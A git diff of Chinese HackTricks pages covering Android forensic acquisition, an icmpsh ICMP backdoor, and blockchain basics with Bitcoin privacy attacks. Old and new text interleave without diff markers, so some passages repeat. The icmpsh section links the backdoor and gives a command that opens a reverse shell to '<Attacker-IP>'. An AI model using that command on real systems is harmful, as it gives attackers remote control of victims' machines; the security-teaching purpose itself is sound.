c. 为避免疑义,许可方也可以根据单独的条款或条件提供许可材料,或随时停止分发许可材料;但是,这样做不会终止本公共许可证。
|
||||
|
||||
d. 第1、5、6、7和8节在本公共许可证终止后仍然有效。
|
||||
## 第7节 - 其他条款和条件。
|
||||
|
||||
a. 除非明确同意,许可方不受您传达的任何额外或不同的条款或条件的约束。
|
||||
|
||||
b. 有关已许可材料的任何安排、理解或协议,若未在此处声明,均与本公共许可证的条款和条件分开且独立。
|
||||
|
||||
## 第8节 - 解释。
|
||||
|
||||
a. 为避免疑义,本公共许可证不会,也不应被解释为,减少、限制、限制或对在本公共许可证下无需许可即可合法进行的任何已许可材料的使用施加条件。
|
||||
|
||||
b. 在可能范围内,如果本公共许可证的任何条款被视为不可执行,则将自动改革至使其可执行的最低程度。如果无法改革该条款,则将其从本公共许可证中剥离,而不影响其余条款和条件的可执行性。
|
||||
|
||||
c. 除非许可方明确同意,否则不会放弃本公共许可证的任何条款或条件,也不会同意违反。
|
||||
|
||||
d. 本公共许可证中的任何内容均不构成或不得被解释为对许可方或您适用的任何特权和豁免的限制或放弃,包括来自任何司法管辖区或权威的法律程序。
|
||||
```
|
||||
Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses.
|
||||
|
||||
Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/).
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为英雄级人物</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) 的github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,51 +1,53 @@
|
|||
# Android 取证
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 HackTricks 的 PDF 版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs 集合**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 锁定设备
|
||||
|
||||
要开始从 Android 设备提取数据,设备必须是解锁状态。如果设备被锁定,您可以:
|
||||
要开始从 Android 设备中提取数据,必须先解锁设备。如果设备已锁定,您可以:
|
||||
|
||||
* 检查设备是否激活了 USB 调试。
|
||||
* 检查可能的[污迹攻击](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf)
|
||||
* 尝试使用[暴力破解](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
|
||||
* 检查设备是否启用了通过 USB 调试。
|
||||
* 检查可能的 [指纹攻击](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf)
|
||||
* 尝试使用 [暴力破解](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
|
||||
|
||||
## 数据获取
|
||||
|
||||
使用 adb 创建[android 备份](mobile-pentesting/android-app-pentesting/adb-commands.md#backup)并使用 [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/) 提取:`java -jar abe.jar unpack file.backup file.tar`
|
||||
使用 adb 创建一个 [android 备份](mobile-pentesting/android-app-pentesting/adb-commands.md#backup),然后使用 [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/) 提取它:`java -jar abe.jar unpack file.backup file.tar`
|
||||
|
||||
### 如果有 root 权限或物理连接到 JTAG 接口
|
||||
### 如果有 root 访问权限或物理连接到 JTAG 接口
|
||||
|
||||
* `cat /proc/partitions`(搜索闪存的路径,通常第一个条目是 _mmcblk0_,对应整个闪存)。
|
||||
* `cat /proc/partitions`(查找闪存的路径,通常第一个条目是 _mmcblk0_,对应整个闪存)。
|
||||
* `df /data`(发现系统的块大小)。
|
||||
* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096(使用从块大小收集的信息执行)。
|
||||
* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096(使用从块大小获取的信息执行)。
|
||||
|
||||
### 内存
|
||||
|
||||
使用 Linux Memory Extractor (LiME) 提取 RAM 信息。它是一个内核扩展,应通过 adb 加载。
|
||||
使用 Linux Memory Extractor (LiME) 提取 RAM 信息。这是一个应通过 adb 加载的内核扩展。
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 HackTricks 的 PDF 版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs 集合**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家,使用</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
从以下链接下载后门:[https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
|
||||
|
@ -35,16 +36,17 @@ read IP
|
|||
```bash
|
||||
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品,称为[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,283 +1,153 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# 基本术语
|
||||
## 基本概念
|
||||
|
||||
* **智能合约**:智能合约简单地说就是**存储在区块链上的程序**,当满足预定条件时运行。它们通常用于自动化**协议的执行**,以便所有参与者可以立即确定结果,无需任何中介的参与或时间损失。(来源:[这里](https://www.ibm.com/topics/smart-contracts))。
|
||||
* 基本上,智能合约是一段**代码**,当人们访问并接受合约时将被执行。智能合约**在区块链上运行**(因此结果被存储为不可变),人们可以在接受之前阅读它们。
|
||||
* **dApps**:**去中心化应用程序**是在**智能合约**之上实现的。它们通常具有用户可以与应用程序交互的前端,**后端**是公开的(因此可以进行审计)并且实现为**智能合约**。有时需要使用数据库,以太坊区块链为每个帐户分配一定的存储空间。
|
||||
* **代币和硬币**:**硬币**是一种作为**数字货币**的加密货币,而**代币**是代表一些**价值**但不是硬币的东西。
|
||||
* **实用性代币**:这些代币允许用户**稍后访问某些服务**(在特定环境中具有某些价值)。
|
||||
* **安全性代币**:这些代表**所有权**或某些资产。
|
||||
* **DeFi**:**去中心化金融**。
|
||||
* **DEX:去中心化交易平台**。
|
||||
* **DAOs**:**去中心化自治组织**。
|
||||
- **智能合约**被定义为在满足特定条件时在区块链上执行的程序,自动化协议执行而无需中介。
|
||||
- **去中心化应用 (dApps)** 建立在智能合约之上,具有用户友好的前端和透明、可审计的后端。
|
||||
- **代币 & 货币** 区分了货币作为数字货币,而代币代表特定情境中的价值或所有权。
|
||||
- **实用性代币** 授予对服务的访问权限,而 **安全性代币** 表示资产所有权。
|
||||
- **DeFi** 代表去中心化金融,提供无需中央机构的金融服务。
|
||||
- **DEX** 和 **DAOs** 分别指去中心化交易平台和去中心化自治组织。
|
||||
|
||||
# 共识机制
|
||||
## 共识机制
|
||||
|
||||
要使区块链交易得到承认,必须将其**附加**到**区块链**上。验证者(矿工)执行此附加操作;在大多数协议中,他们**为此获得奖励**。为了保持区块链的安全性,必须有一种机制来**防止恶意用户或组织接管大多数验证**。
|
||||
共识机制确保在区块链上进行安全且达成一致的交易验证:
|
||||
- **工作量证明 (PoW)** 依赖计算能力进行交易验证。
|
||||
- **权益证明 (PoS)** 要求验证者持有一定数量的代币,相较于 PoW 减少能源消耗。
|
||||
|
||||
工作量证明,另一种常用的共识机制,使用计算能力的验证来验证交易,要求潜在攻击者获取验证者网络大部分计算能力的大部分。
|
||||
## 比特币基础知识
|
||||
|
||||
## 工作量证明(PoW)
|
||||
### 交易
|
||||
|
||||
这使用**计算能力验证**来验证交易,要求潜在攻击者获取验证者网络大部分计算能力的大部分。\
|
||||
**矿工**将**选择几笔交易**,然后开始**计算工作量证明**。**具有最大计算资源的矿工**更有可能**更早完成**工作量证明并获得所有交易的费用。
|
||||
比特币交易涉及在地址之间转移资金。交易通过数字签名进行验证,确保只有私钥的所有者可以发起转账。
|
||||
|
||||
## 权益证明(PoS)
|
||||
#### 关键组件:
|
||||
|
||||
PoS通过**要求验证者拥有一定数量的区块链代币**来实现这一点,要求**潜在攻击者获取区块链上大部分代币**以发动攻击。\
|
||||
在这种共识机制中,矿工拥有的代币越多,矿工被要求创建下一个区块的可能性就越大。\
|
||||
与PoW相比,这大大**减少了矿工消耗的能量**。
|
||||
- **多重签名交易** 需要多个签名来授权交易。
|
||||
- 交易包括 **输入** (资金来源)、**输出** (目的地)、**费用** (支付给矿工) 和 **脚本** (交易规则)。
|
||||
|
||||
# 比特币
|
||||
### 闪电网络
|
||||
|
||||
## 交易
|
||||
旨在通过允许通道内的多个交易,仅向区块链广播最终状态来增强比特币的可扩展性。
|
||||
|
||||
简单的**交易**是从一个地址向另一个地址的**资金转移**。\
|
||||
在比特币中,一个**地址**是**公钥**的哈希值,因此,为了从地址进行交易,某人需要知道与该公钥(地址)关联的私钥。\
|
||||
然后,当执行**交易**时,它会使用地址的私钥进行**签名**,以显示交易的**合法性**。
|
||||
## 比特币隐私问题
|
||||
|
||||
在比特币中生成数字签名的第一部分可以用以下数学方式表示:\
|
||||
_**Sig**_ = _**Fsig**_(_**Fhash**_(_**m**_),_**dA**_)
|
||||
|
||||
其中:
|
||||
|
||||
* \_d\_A是签名**私钥**
|
||||
* _m_是**交易**
|
||||
* Fhash是哈希函数
|
||||
* Fsig是签名算法
|
||||
* Sig是生成的签名
|
||||
|
||||
签名函数(Fsig)生成一个包含两个值R和S的签名:
|
||||
|
||||
* Sig = (R, S)
|
||||
|
||||
一旦计算出R和S,它们将被序列化为一个字节流,然后使用称为Distinguished Encoding Rules(DER)的国际标准编码方案进行编码。为了验证签名的有效性,将使用签名验证算法。验证数字签名需要以下内容:
|
||||
|
||||
* 签名(R和S)
|
||||
* 交易哈希
|
||||
* 与用于创建交易签名的私钥对应的公钥
|
||||
|
||||
签名验证算法有效地意味着只有私钥的所有者(生成公钥的私钥)才能在交易上生成签名。如果签名有效,则签名验证算法将返回“TRUE”。
|
||||
|
||||
### 多重签名交易
|
||||
|
||||
多重签名**地址**是与多个ECDSA私钥关联的地址。最简单的类型是m-of-n地址 - 它与n个私钥关联,并且从该地址发送比特币需要至少m个密钥的签名。多重签名**交易**是从多重签名地址发送资金的交易。
|
||||
|
||||
### 交易字段
|
||||
|
||||
每个比特币交易都有几个字段:
|
||||
|
||||
* **输入**:**比特币**从哪个地址**转移**
|
||||
* **输出**:转移到**每个**输出的地址和金额
|
||||
* **费用**:支付给交易矿工的金额
|
||||
* **Script\_sig**:交易的脚本签名
|
||||
* **Script\_type**:交易类型
|
||||
|
||||
有**2种主要类型**的交易:
|
||||
|
||||
* **P2PKH:“支付到公钥哈希”**:这是交易的执行方式。您要求**发送方**提供有效的**签名**(来自私钥)和**公钥**。交易输出脚本将使用签名和公钥,并通过一些加密函数检查**是否与公钥哈希匹配**,如果匹配,则**资金**将是**可支配的**。这种方法将公钥以哈希形式隐藏,以提供额外的安全性。
|
||||
* **P2SH:“支付到脚本哈希”**:交易的输出只是**脚本**(这意味着想要这笔钱的人发送一个脚本),如果**使用特定参数执行将导致布尔值为`true`或`false`**。如果矿工使用提供的参数运行输出脚本并结果为`true`,则**资金将发送到您想要的输出**。`P2SH`用于**多重签名**钱包,使输出脚本成为**在接受交易之前检查多个签名的逻辑**。`P2SH`也可用于允许任何人或没有人花费资金。如果P2SH交易的输出脚本只是`1`表示为true,则尝试在不提供参数的情况下花费输出将导致`1`,使尝试花费资金的任何人都可以花费。这也适用于返回`0`的脚本,使输出对任何人都不可花费。
|
||||
|
||||
## 闪电网络
|
||||
|
||||
该协议有助于**向通道执行多个交易**,并**仅**将**最终状态**发送到区块链以保存。\
|
||||
这**提高了**比特币区块链的**速度**(每秒仅允许7笔支付),并允许创建**更难追踪的交易**,因为通道是通过比特币区块链的节点创建的:
|
||||
|
||||
![](<../../.gitbook/assets/image (611).png>)
|
||||
|
||||
闪电网络的正常使用包括通过向相关基础区块链(第1层)承诺资金交易来**打开支付通道**,然后进行**任意数量**的闪电网络**交易**,更新通道资金的暂定分配**而无需将其广播到区块链**,最后通过**广播**解决交易的**最终版本**来关闭支付通道以分配通道资金。
|
||||
|
||||
请注意,通道的任一成员都可以随时停止并将通道的最终状态发送到区块链。
|
||||
|
||||
# 比特币隐私攻击
|
||||
|
||||
## 共同输入
|
||||
|
||||
理论上,一笔交易的输入可以属于不同的用户,但实际上这是不常见的,因为这需要额外的步骤。因此,很多时候可以假定**同一笔交易中的2个输入地址属于同一所有者**。
|
||||
|
||||
## UTXO找零地址检测
|
||||
|
||||
**UTXO**表示**未花费的交易输出**(UTXOs)。在使用来自先前交易的输出作为输入的交易中,**整个输出需要被花费**(以避免双重花费攻击)。因此,如果意图是仅**发送**该输出的一部分资金到一个地址并**保留**另一部分资金,将会出现**2个不同的输出**:预期的输出和一个**随机新的找零地址**,剩余资金将保存在其中。
|
||||
|
||||
然后,观察者可以假设**生成的新找零地址属于UTXO的所有者**。
|
||||
|
||||
## 社交网络和论坛
|
||||
|
||||
一些人在互联网上的不同网站上提供有关他们比特币地址的数据。**这使得很容易识别地址的所有者**。
|
||||
|
||||
## 交易图
|
||||
|
||||
通过以图形方式表示交易,**有可能以一定概率知道账户资金的去向**。因此,可以了解与**区块链中相关的用户**的一些信息。
|
||||
|
||||
## **不必要的输入启发式**
|
||||
|
||||
也称为“最佳找零启发式”。考虑这笔比特币交易。它有两个价值分别为2 BTC和3 BTC的输入以及价值为4 BTC和1 BTC的两个输出。
|
||||
```
|
||||
2 btc --> 4 btc
|
||||
3 btc 1 btc
|
||||
```
|
||||
假设其中一个输出是找零,另一个输出是支付。有两种解释:支付输出要么是4 BTC输出,要么是1 BTC输出。但如果1 BTC输出是支付金额,那么3 BTC输入就是不必要的,因为钱包本可以只花费2 BTC输入并支付更低的矿工费用。这表明真正的支付输出是4 BTC,而1 BTC是找零输出。
|
||||
|
||||
这对于具有多个输入的交易是一个问题。修复此泄漏的一种方法是添加更多输入,直到找零输出高于任何输入,例如:
|
||||
```
|
||||
2 btc --> 4 btc
|
||||
3 btc 6 btc
|
||||
5 btc
|
||||
```
|
||||
## 强制地址重用
|
||||
|
||||
**强制地址重用**或**激励地址重用**是指对已在区块链上使用过的地址支付(通常是小额)比特币的对手。对手希望用户或其钱包软件**将这些支付用作更大交易的输入,从而通过共同输入所有权**启发式揭示其他地址。这些支付可以被理解为一种迫使地址所有者无意中重用地址的方式。
|
||||
|
||||
这种攻击有时被错误地称为**尘埃攻击**。
|
||||
|
||||
钱包的正确行为是不要花费已经落入已使用空地址的硬币。
|
||||
|
||||
## 其他区块链分析
|
||||
|
||||
* **确切的支付金额**:为了避免带有找零的交易,支付需要等于UTXO(这是非常不寻常的)。因此,**没有找零地址的交易可能是同一用户之间的转账**。
|
||||
* **整数金额**:在交易中,如果输出之一是“**整数金额**”,那么很可能这是**支付给将该“整数金额”作为价格的人**,因此另一部分必须是剩余部分。
|
||||
* **钱包指纹识别**:仔细的分析师有时可以推断出哪个软件创建了某个交易,因为**许多不同的钱包软件并不总是以完全相同的方式创建交易**。钱包指纹识别可用于检测找零输出,因为找零输出是使用相同钱包指纹花费的输出。
|
||||
* **金额和时间相关性**:如果执行交易的人**披露**了交易的**时间**和/或**金额**,那么这很容易**被发现**。
|
||||
|
||||
## 流量分析
|
||||
|
||||
一些组织**窃听您的流量**可能会看到您在比特币网络中通信。\
|
||||
如果对手看到一个交易或区块**从您的节点发出而之前没有进入**,那么几乎可以确定**该交易是由您进行的或该区块是由您挖掘的**。由于涉及互联网连接,对手将能够**将IP地址与发现的比特币信息联系起来**。
|
||||
|
||||
无法窃听所有互联网流量但拥有**大量比特币节点**以便**更接近**源的攻击者可能能够知道宣布交易或区块的IP地址。\
|
||||
此外,一些钱包定期重新广播其未确认的交易,以便更有可能通过网络广泛传播并被挖掘。
|
||||
|
||||
## 其他攻击以查找地址所有者信息
|
||||
|
||||
有关更多攻击,请阅读[https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy)
|
||||
|
||||
# 匿名比特币
|
||||
隐私攻击,如 **共同输入所有权** 和 **UTXO 更改地址检测**,利用交易模式。像 **混币** 和 **CoinJoin** 这样的策略通过模糊用户之间的交易链接来提高匿名性。
|
||||
|
||||
## 匿名获取比特币
|
||||
|
||||
* **现金交易**:使用现金购买比特币。
|
||||
* **现金替代品**:购买礼品卡或类似物品,并在线交换它们为比特币。
|
||||
* **挖矿**:挖矿是获取比特币最匿名的方式。这适用于独立挖矿,因为[挖矿池](https://en.bitcoin.it/wiki/Pooled\_mining)通常知道哈希者的IP地址。
|
||||
* **盗窃**:理论上,另一种获取匿名比特币的方式是窃取它们。
|
||||
方法包括现金交易、挖矿和使用混币。**CoinJoin** 将多个交易混合在一起以增加追踪难度,而 **PayJoin** 将 CoinJoin 伪装成常规交易以提高隐私性。
|
||||
```bash
|
||||
2 btc --> 4 btc
|
||||
3 btc 1 btc
|
||||
```
|
||||
## **强制地址重用**
|
||||
|
||||
